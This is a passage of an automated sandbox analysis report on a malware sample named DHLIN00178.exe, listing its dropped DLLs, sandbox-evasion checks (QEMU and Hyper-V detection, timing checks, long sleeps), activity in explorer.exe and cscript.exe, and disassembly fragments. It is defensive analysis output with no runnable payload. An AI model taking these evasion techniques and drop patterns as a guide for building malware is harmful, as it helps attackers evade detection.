        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060715B push ds; retf
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061F1E7 push esi; ret
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00621555 push ds; ret
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060D864 push ss; ret
        Source: libdatrie-1.dll.1.drStatic PE information: section name: .xdata
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: section name: .xdata
        Source: maintenanceservice2.exe.1.drStatic PE information: section name: .00cfg
        Source: percentile.dll.1.drStatic PE information: section name: .xdata
        Source: percentile.dll.1.drStatic PE information: section name: /4
        Source: percentile.dll.1.drStatic PE information: section name: /19
        Source: percentile.dll.1.drStatic PE information: section name: /31
        Source: percentile.dll.1.drStatic PE information: section name: /45
        Source: percentile.dll.1.drStatic PE information: section name: /57
        Source: percentile.dll.1.drStatic PE information: section name: /70
        Source: percentile.dll.1.drStatic PE information: section name: /81
        Source: percentile.dll.1.drStatic PE information: section name: /92
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Temp\nsj54D2.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exeJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\explorer.exe TID: 5248Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 8096Thread sleep count: 71 > 30
        Source: C:\Windows\SysWOW64\cscript.exe TID: 8096Thread sleep time: -142000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exeJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dllJump to dropped file
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 rdtsc
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 895
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861
        Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 2.6 %
        Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00402765 FindFirstFileA,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00613200 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\DHLIN00178.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: DHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6914823773.00000000076AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001924598.00000000076AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 rdtsc
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C244D1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C244D1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C354E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C064F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A4F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A4F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF4FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C294FA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E4F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E4F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C00485 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3B490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3B490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C024A2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C024A2 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C344A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C984BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C80443 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB420 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCA464 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E461 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08470 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08470 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF640D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF478 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF409 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C96400 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C96400 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C89429 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37425 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37425 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8F42F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8F42F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8F42F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8F42F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8F42F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBD430 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBD430 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C5C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C805C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C365D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8B5D3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A5E7 mov ebx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A5E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C855E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C315EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C5FC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A580 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A580 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C39580 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C39580 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF582 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E588 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E588 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C32594 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C592 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CA7591 mov edi, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C885AA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C045B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C045B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C36540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C38540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1E547 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0254C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDB55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDB55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCA553 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1C560 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C89567 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB502 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C02500 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E507 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C50D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3C50D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C51D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C21514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3F523 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C31527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C03536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C03536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CA86C2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCA6C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C006CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2D6D0 mov eax, dword ptr fs:[00000030h]
